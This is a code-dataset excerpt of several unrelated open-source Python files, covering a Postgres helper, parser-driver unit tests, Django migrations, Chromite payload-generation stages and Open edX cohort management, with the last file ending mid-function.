raise Exception('Section {0} not found in the {1} file'.format(section, filename))
def connect(self):
self.conn = None
try:
self.conn = psycopg2.connect(**self.db)
self.cur = self.conn.cursor()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
def close(self):
self.conn.close()
def execute(self, sql, params = ()):
self.cur.execute(sql, params)
self.conn.commit()
def get_version(self):
self.connect()
self.cur.execute('SELECT version()')
version = self.cur.fetchone()
self.close()
return version
|
ICOS-Carbon-Portal/data
|
src/main/python/mongo-to-pg/Postgres.py
|
Python
|
gpl-3.0
| 1,006 | 0.033797 |
import io
import json
import os
import subprocess
import sys
import unittest
from os.path import join, abspath, dirname
sys.path.append('..')
from python_driver import __version__, get_processor_instance
from python_driver.requestprocessor import (
Request, Response, RequestProcessorJSON, InBuffer, EmptyCodeException)
from typing import Dict, Any, List, AnyStr, Optional, Iterator, cast
CURDIR = abspath(dirname(__file__))
# Disabled until I update the new module with typing
# class TestTypeCheck(unittest.TestCase):
# def test_10_check(self) -> None:
# prevdir = os.getcwd()
# try:
# os.chdir(dirname(CURDIR))
# srcdir = abspath(join(dirname(CURDIR), 'python_driver', '*'))
# self.assertEqual(subprocess.call(['test/typecheck.sh', srcdir], shell=True), 0)
# finally:
# os.chdir(prevdir)
class TestPythonDriverBase(unittest.TestCase):
def _restart_data(self, format_: str='json') -> None:
assert format_ == 'json'
with open(join(CURDIR, 'data', 'helloworld.py')) as f:
testcode = f.read()
self.data = Request({
'filepath': 'test.py',
'action': 'ParseAST',
'content': testcode,
'language': 'python',
})
bufferclass = io.StringIO if format_ == 'json' else io.BytesIO
# This will mock the python_driver stdin
self.sendbuffer = bufferclass()
# This will mock the python_driver stdout
self.recvbuffer = bufferclass()
@staticmethod
def _extract_docs(inbuffer: InBuffer) -> Iterator[Response]:
"""
This generator will read the inbuffer yielding the JSON
docs when it finds the ending mark
"""
line: str
for line in inbuffer.readlines():
yield json.loads(line)
def _loadResults(self, format_: str) -> List[Response]:
"""Read all msgs from the recvbuffer"""
self.recvbuffer.seek(0)
res: List[Response] = []
res = [doc for doc in self._extract_docs(self.recvbuffer)]
return res
class Test10ProcessRequestFunc(TestPythonDriverBase):
def _add_to_buffer(self, count: int, format_: str) -> None:
"""Add count test msgs to the sendbuffer"""
for i in range(count):
msg = ''
msg = json.dumps(self.data, ensure_ascii=False) + '\n'
self.sendbuffer.write(msg)
self.sendbuffer.flush()
def _send_receive(self, nummsgs: int, outformat: str='json',
dataupdate: Optional[Dict[AnyStr, Any]]=None,
restart_data: bool=True) -> List[Response]:
if restart_data:
self._restart_data(outformat)
if dataupdate:
self.data.update(dataupdate)
self._add_to_buffer(nummsgs, outformat)
self.sendbuffer.seek(0)
processor, _ = get_processor_instance(
outformat,
custom_outbuffer=self.recvbuffer,
custom_inbuffer=self.sendbuffer
)
processor.process_requests(self.sendbuffer)
return self._loadResults(outformat)
def _check_reply_dict(self, response: Response, has_errors: bool=False) -> None:
self.assertIsInstance(response, dict)
status = response.get('status')
if has_errors:
assert status in ('error', 'fatal')
errors = response.get('errors', list)
self.assertIsInstance(errors, list)
self.assertGreater(len(errors), 0)
else:
self.assertEqual(status, 'ok')
self._check_AST_dict(response)
language_version = response['metadata'].get('language_version', -1)
assert str(language_version) in ('2', '3')
def _check_AST_dict(self, response: Response) -> None:
self.assertIsNotNone(response)
assert 'ast' in response
self.assertIsInstance(response['ast'], dict)
root_key = list(response['ast'].keys())[0]
assert root_key
for key in ('ast_type', 'body'):
assert key in response['ast'][root_key]
self.assertIsInstance(response['ast'][root_key]['body'], list)
for item in response['ast'][root_key]['body']:
for key in ('ast_type', 'lineno', 'col_offset'):
assert key in item
def test_010_normal_json(self) -> None:
replies = self._send_receive(1, 'json')
self.assertEqual(len(replies), 1)
self._check_reply_dict(replies[0])
def test_020_normal_json_many(self) -> None:
replies = self._send_receive(100, 'json')
self.assertEqual(len(replies), 100)
for reply in replies:
self._check_reply_dict(reply)
def test_030_error_print(self) -> None:
wrongcode = 'wtf lol'
replies = self._send_receive(1, 'json', {'content': wrongcode})
self.assertEqual(len(replies), 1)
ast = replies[0].get('ast')
self.assertIsNone(ast)
self._check_reply_dict(replies[0], has_errors=True)
# Check that it still alive
self._restart_data()
replies = self._send_receive(1, 'json')
self.assertEqual(len(replies), 1)
def test_040_broken_json(self) -> None:
self._restart_data('json')
brokendata = json.dumps(self.data, ensure_ascii=False)[:-30]
self.sendbuffer.write(brokendata)
self.sendbuffer.flush()
reply = self._send_receive(1, 'json', restart_data=False)[0]
self.assertEqual(reply['status'], 'fatal')
self.assertEqual(len(reply['errors']), 1)
class Test20ReqProcMethods(TestPythonDriverBase):
def test_10_send_response_json(self) -> None:
self._restart_data('json')
processor = RequestProcessorJSON(self.recvbuffer)
processor._send_response(cast(Response, self.data))
res = self._loadResults('json')
self.assertEqual(len(res), 1)
self.assertDictEqual(self.data, res[0])
# process request already tested with TestPythonDriverBase
def test_20_return_error(self) -> None:
self._restart_data('json')
processor = RequestProcessorJSON(self.recvbuffer)
processor.errors = ['test error']
processor._return_error('test.py', 'fatal')
res = self._loadResults('json')
self.assertEqual(len(res), 1)
self.assertDictEqual(res[0] , {'driver': 'python23:%s' % __version__,
'errors': ['test error'],
'filepath': 'test.py',
'ast': None,
'status': 'fatal'})
if __name__ == '__main__':
unittest.main()
|
juanjux/python-driver
|
native/python_package/test/test_python_driver.py
|
Python
|
gpl-3.0
| 6,751 | 0.003555 |
# -*- coding: utf-8 -*-
"""Factories to help in tests."""
from factory import PostGenerationMethodCall, Sequence
from factory.alchemy import SQLAlchemyModelFactory
from authmgr.database import db
from authmgr.user.models import User
class BaseFactory(SQLAlchemyModelFactory):
"""Base factory."""
class Meta:
"""Factory configuration."""
abstract = True
sqlalchemy_session = db.session
class UserFactory(BaseFactory):
"""User factory."""
username = Sequence(lambda n: 'user{0}'.format(n))
email = Sequence(lambda n: 'user{0}@example.com'.format(n))
password = PostGenerationMethodCall('set_password', 'example')
active = True
class Meta:
"""Factory configuration."""
model = User
|
bcarroll/authmgr
|
authmgr/tests/factories.py
|
Python
|
bsd-3-clause
| 761 | 0 |
###############################################################################
# Name: txtutil.py #
# Purpose: Text Utilities. #
# Author: Cody Precord <cprecord@editra.org> #
# Copyright: (c) 2009 Cody Precord <staff@editra.org> #
# Licence: wxWindows Licence #
###############################################################################
"""
Editra Business Model Library: Text Utilities
Utility functions for managing and working with text.
"""
__author__ = "Cody Precord <cprecord@editra.org>"
__svnid__ = "$Id: txtutil.py 62571 2009-11-08 17:53:27Z CJP $"
__revision__ = "$Revision: 62571 $"
__all__ = [ 'IsUnicode', ]
#-----------------------------------------------------------------------------#
# Imports
import types
#-----------------------------------------------------------------------------#
def IsUnicode(txt):
"""Is the given string a unicode string
@param txt: object
@return: bool
"""
return isinstance(txt, types.UnicodeType)
|
163gal/Time-Line
|
libs/wx/tools/Editra/src/ebmlib/txtutil.py
|
Python
|
gpl-3.0
| 1,195 | 0.003347 |
def on_square():
pass
def total_after():
pass
|
rootulp/xpython
|
exercises/grains/grains.py
|
Python
|
mit
| 56 | 0 |
# -*- coding: utf-8 -*-
import user
import inscription
import notes
import util
import stage
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
anaslamaizi/Projet-ODOO
|
__init__.py
|
Python
|
artistic-2.0
| 160 | 0.00625 |
print("test\n")
|
heavywatal/practice-py
|
Kazuki526/test.py
|
Python
|
mit
| 16 | 0 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-06-01 12:02
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('website', '0030_github_user'),
]
operations = [
migrations.AddField(
model_name='linkedin_user',
name='number_all_repos',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='linkedin_user',
name='number_repos1',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='linkedin_user',
name='number_repos2',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='linkedin_user',
name='number_repos3',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='linkedin_user',
name='technology1',
field=models.CharField(default='', max_length=50),
),
migrations.AddField(
model_name='linkedin_user',
name='technology2',
field=models.CharField(default='', max_length=50),
),
migrations.AddField(
model_name='linkedin_user',
name='technology3',
field=models.CharField(default='', max_length=50),
),
]
|
hiezust/teask
|
website/migrations/0031_auto_20170601_1502.py
|
Python
|
gpl-3.0
| 1,475 | 0 |
from django.db import models
class BranchManager(models.Manager):
def get_branch(self, user, project):
try:
return self.get(user=user, project=project, active=True)
except:
return self.create(user=user, project=project, active=True)
class Branch(models.Model):
user = models.ForeignKey('auth.User')
project = models.ForeignKey('projects.Project')
active = models.BooleanField(default=True)
pushed = models.BooleanField(default=False)
title = models.TextField(default='')
comment = models.TextField(default='')
objects = BranchManager()
def __unicode__(self):
return "Branch of %s by %s (%s)" % (self.project, self.user, self.pk)
|
alex/readthedocs.org
|
readthedocs/editor/models.py
|
Python
|
mit
| 726 | 0.00551 |
from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
class NavConfig(AppConfig):
name = 'cms.nav'
verbose_name = _('Navigation')
|
HurtowniaPixeli/pixelcms-server
|
cms/nav/apps.py
|
Python
|
mit
| 176 | 0 |
import sys
import os
import cv2
from keras.models import load_model
sys.path.append("/Users/alexpapiu/Documents/Conv/OpenCV_CNN")
from webcam_cnn_pipeline import return_compiled_model_2, real_time_pred
model_name = sys.argv[1]
w = 1.5*144
h = 2*144
#keep track of all labels:
all_labels = {"model_hand":["A", "B", "C", "D", "No Hand"],
"basic_model":["happy", "sad", "normal", "incredulous"],
"model_face":["happy", "sad", "normal"]}
labelz = dict(enumerate(all_labels[model_name]))
os.chdir("/Users/alexpapiu/Documents/Data/OpenCV_CNN")
model = return_compiled_model_2(input_shape = (3,int(h),int(w)),
num_class = len(labelz))
model.load_weights(model_name)
#open a new video:
cp = cv2.VideoCapture(0)
cp.set(3, w)
cp.set(4, h)
real_time_pred(model, labelz, cp = cp, nframes = 10000)
|
apapiu/live_cnn
|
live_cnn/reusing_model.py
|
Python
|
apache-2.0
| 861 | 0.019744 |
# pandas and numpy for data manipulation
import pandas as pd
import numpy as np
import sqlite3
from bokeh.plotting import Figure
from bokeh.models import (
CategoricalColorMapper,
HoverTool,
ColumnDataSource,
Panel,
FuncTickFormatter,
SingleIntervalTicker,
LinearAxis,
)
from bokeh.models import Legend
from bokeh.models.widgets import (
CheckboxGroup,
Slider,
RangeSlider,
Tabs,
CheckboxButtonGroup,
TableColumn,
DataTable,
Select,
)
from bokeh.layouts import column, row, WidgetBox
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import matplotlib.colors as colors
def perfmon_tab(db):
def make_dataset(perfmon_list):
newdf = perfmon[perfmon_list]
# Convert dataframe to column data source
return ColumnDataSource(newdf)
def make_plot(src):
# Blank plot with correct labels
p = Figure(
plot_width=1024,
plot_height=768,
x_axis_type="datetime",
title="perfmon",
output_backend="webgl",
)
cm = plt.get_cmap("gist_rainbow")
numlines = len(perfmon.columns)
mypal = [cm(1.0 * i / numlines) for i in range(numlines)]
mypal = list(map(lambda x: colors.rgb2hex(x), mypal))
col = 0
legenditems = []
for key in src.data.keys():
if key == "datetime":
continue
l = key + " "
col = col + 1
cline = p.line(
perfmon.index.values,
perfmon[key],
line_width=1,
alpha=0.8,
color=mypal[col],
)
legenditems += [(key, [cline])]
p.legend.click_policy = "hide"
legend = Legend(items=legenditems, location=(0, 0))
p.add_layout(legend, "below")
return p
def update(attr, old, new):
perfmons_to_plot = [
perfmon_selection.labels[i] for i in perfmon_selection.active
]
new_src = make_dataset(perfmons_to_plot)
plot = make_plot(new_src)
# TODO:crude hack in lack of a better solution so far
layout.children[1] = plot
# get data from DB, setup index
cur = db.cursor()
cur.execute(
"SELECT name FROM sqlite_master WHERE type='table' AND name=?", ["perfmon"]
)
if len(cur.fetchall()) == 0:
return None
perfmon = pd.read_sql_query("select * from perfmon", db)
perfmon.index = pd.to_datetime(perfmon["datetime"])
perfmon = perfmon.drop(["datetime"], axis=1)
perfmon.index.name = "datetime"
perfmon_selection = CheckboxGroup(
labels=list(perfmon.columns),
active=[0, 5],
width=300,
height=800,
sizing_mode="fixed",
)
perfmon_list = [perfmon_selection.labels[i] for i in perfmon_selection.active]
src = make_dataset(perfmon_list)
plot = make_plot(src)
perfmon_selection.on_change("active", update)
controls = WidgetBox(perfmon_selection, width=300, height=800, sizing_mode="fixed")
layout = row(controls, plot)
tab = Panel(child=layout, title="perfmon")
return tab
|
murrayo/yape
|
yapesrv/scripts/perfmon_tab.py
|
Python
|
mit
| 3,197 | 0.001877 |
# Copyright (c) Meta Platforms, Inc. and affiliates.
# Copyright (c) Mercurial Contributors.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
from testutil.dott import feature, sh, testtmp # noqa: F401
feature.require(["symlink"])
# https://bz.mercurial-scm.org/1438
sh % "hg init repo"
sh % "cd repo"
sh % "ln -s foo link"
sh % "hg add link"
sh % "hg ci -mbad link"
sh % "hg rm link"
sh % "hg ci -mok"
sh % "hg diff -g -r '0:1'" > "bad.patch"
sh % "hg up 0" == "1 files updated, 0 files merged, 0 files removed, 0 files unresolved"
sh % "hg import --no-commit bad.patch" == "applying bad.patch"
sh % "hg status" == r"""
R link
? bad.patch"""
|
facebookexperimental/eden
|
eden/scm/tests/test-issue1438-t.py
|
Python
|
gpl-2.0
| 789 | 0.001267 |
# Copyright (c) 2013 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Module containing the various stages that a builder runs."""
import json
import logging
import os
from chromite.cbuildbot import commands
from chromite.cbuildbot import failures_lib
from chromite.cbuildbot import cbuildbot_run
from chromite.cbuildbot.stages import artifact_stages
from chromite.lib import cros_build_lib
from chromite.lib import gs
from chromite.lib import osutils
from chromite.lib import parallel
from chromite.lib import timeout_util
class InvalidTestConditionException(Exception):
"""Raised when pre-conditions for a test aren't met."""
class SignerTestStage(artifact_stages.ArchivingStage):
"""Run signer related tests."""
option_name = 'tests'
config_name = 'signer_tests'
# If the signer tests take longer than 30 minutes, abort. They usually take
# five minutes to run.
SIGNER_TEST_TIMEOUT = 1800
def PerformStage(self):
if not self.archive_stage.WaitForRecoveryImage():
raise InvalidTestConditionException('Missing recovery image.')
with timeout_util.Timeout(self.SIGNER_TEST_TIMEOUT):
commands.RunSignerTests(self._build_root, self._current_board)
class SignerResultsTimeout(failures_lib.StepFailure):
"""The signer did not produce any results inside the expected time."""
class SignerFailure(failures_lib.StepFailure):
"""The signer returned an error result."""
class MissingInstructionException(failures_lib.StepFailure):
"""We didn't receive the list of signing instructions PushImage uploaded."""
class MalformedResultsException(failures_lib.StepFailure):
"""The Signer results aren't formatted as we expect."""
class PaygenSigningRequirementsError(failures_lib.StepFailure):
"""Paygen stage can't run if signing failed."""
class PaygenCrostoolsNotAvailableError(failures_lib.StepFailure):
"""Paygen stage can't run if signing failed."""
class PaygenNoPaygenConfigForBoard(failures_lib.StepFailure):
"""Paygen can't run with a release.conf config for the board."""
class PaygenStage(artifact_stages.ArchivingStage):
"""Stage that generates release payloads.
If this stage is created with a 'channels' argument, it can run
independantly. Otherwise, it's dependent on values queued up by
the ArchiveStage (push_image).
"""
option_name = 'paygen'
config_name = 'paygen'
# Poll for new results every 30 seconds.
SIGNING_PERIOD = 30
# Timeout for PushImage to finish uploading images. 2 hours in seconds.
PUSHIMAGE_TIMEOUT = 2 * 60 * 60
# Timeout for the signing process. 2 hours in seconds.
SIGNING_TIMEOUT = 2 * 60 * 60
FINISHED = 'finished'
def __init__(self, builder_run, board, archive_stage, channels=None,
**kwargs):
"""Init that accepts the channels argument, if present.
Args:
builder_run: See builder_run on ArchivingStage.
board: See board on ArchivingStage.
archive_stage: See archive_stage on ArchivingStage.
channels: Explicit list of channels to generate payloads for.
If empty, will instead wait on values from push_image.
Channels is normally None in release builds, and normally set
for trybot 'payloads' builds.
"""
super(PaygenStage, self).__init__(builder_run, board, archive_stage,
**kwargs)
self.signing_results = {}
self.channels = channels
def _HandleStageException(self, exc_info):
"""Override and don't set status to FAIL but FORGIVEN instead."""
exc_type, exc_value, _exc_tb = exc_info
# If Paygen fails to find anything needed in release.conf, treat it
# as a warning, not a failure. This is common during new board bring up.
if issubclass(exc_type, PaygenNoPaygenConfigForBoard):
return self._HandleExceptionAsWarning(exc_info)
# If the exception is a TestLabFailure that means we couldn't schedule the
# test. We don't fail the build for that. We do the CompoundFailure dance,
# because that's how we'll get failures from background processes returned
# to us.
if (issubclass(exc_type, failures_lib.TestLabFailure) or
(issubclass(exc_type, failures_lib.CompoundFailure) and
exc_value.MatchesFailureType(failures_lib.TestLabFailure))):
return self._HandleExceptionAsWarning(exc_info)
return super(PaygenStage, self)._HandleStageException(exc_info)
def _JsonFromUrl(self, gs_ctx, url):
"""Fetch a GS Url, and parse it as Json.
Args:
gs_ctx: GS Context.
url: Url to fetch and parse.
Returns:
None if the Url doesn't exist.
Parsed Json structure if it did.
Raises:
MalformedResultsException if it failed to parse.
"""
try:
signer_txt = gs_ctx.Cat(url).output
except gs.GSNoSuchKey:
return None
try:
return json.loads(signer_txt)
except ValueError:
# We should never see malformed Json, even for intermediate statuses.
raise MalformedResultsException(signer_txt)
def _SigningStatusFromJson(self, signer_json):
"""Extract a signing status from a signer result Json DOM.
Args:
signer_json: The parsed json status from a signer operation.
Returns:
string with a simple status: 'passed', 'failed', 'downloading', etc,
or '' if the json doesn't contain a status.
"""
return (signer_json or {}).get('status', {}).get('status', '')
def _CheckForResults(self, gs_ctx, instruction_urls_per_channel,
channel_notifier):
"""timeout_util.WaitForSuccess func to check a list of signer results.
Args:
gs_ctx: Google Storage Context.
instruction_urls_per_channel: Urls of the signer result files
we're expecting.
channel_notifier: BackgroundTaskRunner into which we push channels for
processing.
Returns:
Number of results not yet collected.
"""
COMPLETED_STATUS = ('passed', 'failed')
# Assume we are done, then try to prove otherwise.
results_completed = True
for channel in instruction_urls_per_channel.keys():
self.signing_results.setdefault(channel, {})
if (len(self.signing_results[channel]) ==
len(instruction_urls_per_channel[channel])):
continue
for url in instruction_urls_per_channel[channel]:
# Convert from instructions URL to instructions result URL.
url += '.json'
# We already have a result for this URL.
if url in self.signing_results[channel]:
continue
signer_json = self._JsonFromUrl(gs_ctx, url)
if self._SigningStatusFromJson(signer_json) in COMPLETED_STATUS:
# If we find a completed result, remember it.
self.signing_results[channel][url] = signer_json
# If we don't have full results for this channel, we aren't done
# waiting.
if (len(self.signing_results[channel]) !=
len(instruction_urls_per_channel[channel])):
results_completed = False
continue
# If we reach here, the channel has just been completed for the first
# time.
# If all results 'passed' the channel was successfully signed.
channel_success = True
for signer_result in self.signing_results[channel].values():
if self._SigningStatusFromJson(signer_result) != 'passed':
channel_success = False
# If we successfully completed the channel, inform paygen.
if channel_success:
channel_notifier(channel)
return results_completed
def _WaitForPushImage(self):
"""Block until push_image data is ready.
Returns:
Push_image results, expected to be of the form:
{ 'channel': ['gs://instruction_uri1', 'gs://signer_instruction_uri2'] }
Raises:
MissingInstructionException: If push_image sent us an error, or timed out.
"""
try:
instruction_urls_per_channel = self.board_runattrs.GetParallel(
'instruction_urls_per_channel', timeout=self.PUSHIMAGE_TIMEOUT)
except cbuildbot_run.AttrTimeoutError:
instruction_urls_per_channel = None
# A value of None signals an error, either in PushImage, or a timeout.
if instruction_urls_per_channel is None:
raise MissingInstructionException('PushImage results not available.')
return instruction_urls_per_channel
def _WaitForSigningResults(self,
instruction_urls_per_channel,
channel_notifier):
"""Do the work of waiting for signer results and logging them.
Args:
instruction_urls_per_channel: push_image data (see _WaitForPushImage).
channel_notifier: BackgroundTaskRunner into which we push channels for
processing.
Raises:
ValueError: If the signer result isn't valid json.
RunCommandError: If we are unable to download signer results.
"""
gs_ctx = gs.GSContext(dry_run=self._run.debug)
try:
cros_build_lib.Info('Waiting for signer results.')
timeout_util.WaitForReturnTrue(
self._CheckForResults,
func_args=(gs_ctx, instruction_urls_per_channel, channel_notifier),
timeout=self.SIGNING_TIMEOUT, period=self.SIGNING_PERIOD)
except timeout_util.TimeoutError:
msg = 'Image signing timed out.'
cros_build_lib.Error(msg)
cros_build_lib.PrintBuildbotStepText(msg)
raise SignerResultsTimeout(msg)
# Log all signer results, then handle any signing failures.
failures = []
for url_results in self.signing_results.values():
for url, signer_result in url_results.iteritems():
result_description = os.path.basename(url)
cros_build_lib.PrintBuildbotStepText(result_description)
cros_build_lib.Info('Received results for: %s', result_description)
cros_build_lib.Info(json.dumps(signer_result, indent=4))
status = self._SigningStatusFromJson(signer_result)
if status != 'passed':
failures.append(result_description)
cros_build_lib.Error('Signing failed for: %s', result_description)
if failures:
cros_build_lib.Error('Failure summary:')
for failure in failures:
cros_build_lib.Error(' %s', failure)
raise SignerFailure(failures)
def PerformStage(self):
"""Do the work of generating our release payloads."""
# Convert to release tools naming for boards.
board = self._current_board.replace('_', '-')
version = self._run.attrs.release_tag
assert version, "We can't generate payloads without a release_tag."
logging.info("Generating payloads for: %s, %s", board, version)
# Test to see if the current board has a Paygen configuration. We do
# this here, no in the sub-process so we don't have to pass back a
# failure reason.
try:
from crostools.lib import paygen_build_lib
paygen_build_lib.ValidateBoardConfig(board)
except paygen_build_lib.BoardNotConfigured:
raise PaygenNoPaygenConfigForBoard(
'No release.conf entry was found for board %s. Get a TPM to fix.' %
board)
except ImportError:
raise PaygenCrostoolsNotAvailableError()
with parallel.BackgroundTaskRunner(self._RunPaygenInProcess) as per_channel:
def channel_notifier(channel):
per_channel.put((channel, board, version, self._run.debug,
self._run.config.paygen_skip_testing,
self._run.config.paygen_skip_delta_payloads))
if self.channels:
logging.info("Using explicit channels: %s", self.channels)
# If we have an explicit list of channels, use it.
for channel in self.channels:
channel_notifier(channel)
else:
instruction_urls_per_channel = self._WaitForPushImage()
self._WaitForSigningResults(instruction_urls_per_channel,
channel_notifier)
def _RunPaygenInProcess(self, channel, board, version, debug,
skip_test_payloads, skip_delta_payloads):
"""Helper for PaygenStage that invokes payload generation.
This method is intended to be safe to invoke inside a process.
Args:
channel: Channel of payloads to generate ('stable', 'beta', etc)
board: Board of payloads to generate ('x86-mario', 'x86-alex-he', etc)
version: Version of payloads to generate.
debug: Flag telling if this is a real run, or a test run.
skip_test_payloads: Skip generating test payloads, and auto tests.
skip_delta_payloads: Skip generating delta payloads.
"""
# TODO(dgarrett): Remove when crbug.com/341152 is fixed.
# These modules are imported here because they aren't always available at
# cbuildbot startup.
# pylint: disable=F0401
try:
from crostools.lib import gspaths
from crostools.lib import paygen_build_lib
except ImportError:
# We can't generate payloads without crostools.
raise PaygenCrostoolsNotAvailableError()
# Convert to release tools naming for channels.
if not channel.endswith('-channel'):
channel += '-channel'
with osutils.TempDir(sudo_rm=True) as tempdir:
# Create the definition of the build to generate payloads for.
build = gspaths.Build(channel=channel,
board=board,
version=version)
try:
# Generate the payloads.
self._PrintLoudly('Starting %s, %s, %s' % (channel, version, board))
paygen_build_lib.CreatePayloads(build,
work_dir=tempdir,
dry_run=debug,
run_parallel=True,
run_on_builder=True,
skip_delta_payloads=skip_delta_payloads,
skip_test_payloads=skip_test_payloads,
skip_autotest=skip_test_payloads)
except (paygen_build_lib.BuildFinished,
paygen_build_lib.BuildLocked,
paygen_build_lib.BuildSkip) as e:
# These errors are normal if it's possible for another process to
# work on the same build. This process could be a Paygen server, or
# another builder (perhaps by a trybot generating payloads on request).
#
# This means the build was finished by the other process, is already
# being processed (so the build is locked), or that it's been marked
# to skip (probably done manually).
cros_build_lib.Info('Paygen skipped because: %s', e)
|
bpsinc-native/src_third_party_chromite
|
cbuildbot/stages/release_stages.py
|
Python
|
bsd-3-clause
| 14,805 | 0.006754 |
"""
This file contains the logic for cohorts, as exposed internally to the
forums, and to the cohort admin views.
"""
import logging
import random
import request_cache
from courseware import courses
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.core.validators import validate_email
from django.db import IntegrityError, transaction
from django.db.models.signals import m2m_changed, post_save
from django.dispatch import receiver
from django.http import Http404
from django.utils.translation import ugettext as _
from eventtracking import tracker
from request_cache.middleware import request_cached
from student.models import get_user_by_username_or_email
from .models import (
CohortMembership,
CourseCohort,
CourseCohortsSettings,
CourseUserGroup,
CourseUserGroupPartitionGroup,
UnregisteredLearnerCohortAssignments
)
log = logging.getLogger(__name__)
@receiver(post_save, sender=CourseUserGroup)
def _cohort_added(sender, **kwargs):
"""Emits a tracking log event each time a cohort is created"""
instance = kwargs["instance"]
if kwargs["created"] and instance.group_type == CourseUserGroup.COHORT:
tracker.emit(
"edx.cohort.created",
{"cohort_id": instance.id, "cohort_name": instance.name}
)
@receiver(m2m_changed, sender=CourseUserGroup.users.through)
def _cohort_membership_changed(sender, **kwargs):
"""Emits a tracking log event each time cohort membership is modified"""
def get_event_iter(user_id_iter, cohort_iter):
"""
Returns a dictionary containing a mashup of cohort and user information for the given lists
"""
return (
{"cohort_id": cohort.id, "cohort_name": cohort.name, "user_id": user_id}
for user_id in user_id_iter
for cohort in cohort_iter
)
action = kwargs["action"]
instance = kwargs["instance"]
pk_set = kwargs["pk_set"]
reverse = kwargs["reverse"]
if action == "post_add":
event_name = "edx.cohort.user_added"
elif action in ["post_remove", "pre_clear"]:
event_name = "edx.cohort.user_removed"
else:
return
if reverse:
user_id_iter = [instance.id]
if action == "pre_clear":
cohort_iter = instance.course_groups.filter(group_type=CourseUserGroup.COHORT)
else:
cohort_iter = CourseUserGroup.objects.filter(pk__in=pk_set, group_type=CourseUserGroup.COHORT)
else:
cohort_iter = [instance] if instance.group_type == CourseUserGroup.COHORT else []
if action == "pre_clear":
user_id_iter = (user.id for user in instance.users.all())
else:
user_id_iter = pk_set
for event in get_event_iter(user_id_iter, cohort_iter):
tracker.emit(event_name, event)
# A 'default cohort' is an auto-cohort that is automatically created for a course if no cohort with automatic
# assignment have been specified. It is intended to be used in a cohorted course for users who have yet to be assigned
# to a cohort, if the course staff have not explicitly created a cohort of type "RANDOM".
# Note that course staff have the ability to change the name of this cohort after creation via the cohort
# management UI in the instructor dashboard.
DEFAULT_COHORT_NAME = _("Default Group")
# tl;dr: global state is bad. capa reseeds random every time a problem is loaded. Even
# if and when that's fixed, it's a good idea to have a local generator to avoid any other
# code that messes with the global random module.
_local_random = None
def local_random():
"""
Get the local random number generator. In a function so that we don't run
random.Random() at import time.
"""
# ironic, isn't it?
global _local_random
if _local_random is None:
_local_random = random.Random()
return _local_random
def is_course_cohorted(course_key):
"""
Given a course key, return a boolean for whether or not the course is
cohorted.
Raises:
Http404 if the course doesn't exist.
"""
return _get_course_cohort_settings(course_key).is_cohorted
def get_course_cohort_id(course_key):
"""
Given a course key, return the int id for the cohort settings.
Raises:
Http404 if the course doesn't exist.
"""
return _get_course_cohort_settings(course_key).id
def set_course_cohorted(course_key, cohorted):
"""
Given a course course and a boolean, sets whether or not the course is cohorted.
Raises:
Value error if `cohorted` is not a boolean
"""
if not isinstance(cohorted, bool):
raise ValueError("Cohorted must be a boolean")
course_cohort_settings = _get_course_cohort_settings(course_key)
course_cohort_settings.is_cohorted = cohorted
course_cohort_settings.save()
def get_cohort_id(user, course_key, use_cached=False):
"""
Given a course key and a user, return the id of the cohort that user is
assigned to in that course. If they don't have a cohort, return None.
"""
cohort = get_cohort(user, course_key, use_cached=use_cached)
return None if cohort is None else cohort.id
COHORT_CACHE_NAMESPACE = u"cohorts.get_cohort"
def _cohort_cache_key(user_id, course_key):
"""
Returns the cache key for the given user_id and course_key.
"""
return u"{}.{}".format(user_id, course_key)
def bulk_cache_cohorts(course_key, users):
"""
Pre-fetches and caches the cohort assignments for the
given users, for later fast retrieval by get_cohort.
"""
# before populating the cache with another bulk set of data,
# remove previously cached entries to keep memory usage low.
request_cache.clear_cache(COHORT_CACHE_NAMESPACE)
cache = request_cache.get_cache(COHORT_CACHE_NAMESPACE)
if is_course_cohorted(course_key):
cohorts_by_user = {
membership.user: membership
for membership in
CohortMembership.objects.filter(user__in=users, course_id=course_key).select_related('user__id')
}
for user, membership in cohorts_by_user.iteritems():
cache[_cohort_cache_key(user.id, course_key)] = membership.course_user_group
uncohorted_users = filter(lambda u: u not in cohorts_by_user, users)
else:
uncohorted_users = users
for user in uncohorted_users:
cache[_cohort_cache_key(user.id, course_key)] = None
def get_cohort(user, course_key, assign=True, use_cached=False):
"""
Returns the user's cohort for the specified course.
The cohort for the user is cached for the duration of a request. Pass
use_cached=True to use the cached value instead of fetching from the
database.
Arguments:
user: a Django User object.
course_key: CourseKey
assign (bool): if False then we don't assign a group to user
use_cached (bool): Whether to use the cached value or fetch from database.
Returns:
A CourseUserGroup object if the course is cohorted and the User has a
cohort, else None.
Raises:
ValueError if the CourseKey doesn't exist.
"""
cache = request_cache.get_cache(COHORT_CACHE_NAMESPACE)
cache_key = _cohort_cache_key(user.id, course_key)
if use_cached and cache_key in cache:
return cache[cache_key]
cache.pop(cache_key, None)
# First check whether the course is cohorted (users shouldn't be in a cohort
# in non-cohorted courses, but settings can change after course starts)
if not is_course_cohorted(course_key):
return cache.setdefault(cache_key, None)
# If course is cohorted, check if the user already has a cohort.
try:
membership = CohortMembership.objects.get(
course_id=course_key,
user_id=user.id,
)
return cache.setdefault(cache_key, membership.course_user_group)
except CohortMembership.DoesNotExist:
# Didn't find the group. If we do not want to assign, return here.
if not assign:
# Do not cache the cohort here, because in the next call assign
# may be True, and we will have to assign the user a cohort.
return None
# Otherwise assign the user a cohort.
try:
with transaction.atomic():
# If learner has been pre-registered in a cohort, get that cohort. Otherwise assign to a random cohort.
course_user_group = None
for assignment in UnregisteredLearnerCohortAssignments.objects.filter(email=user.email, course_id=course_key):
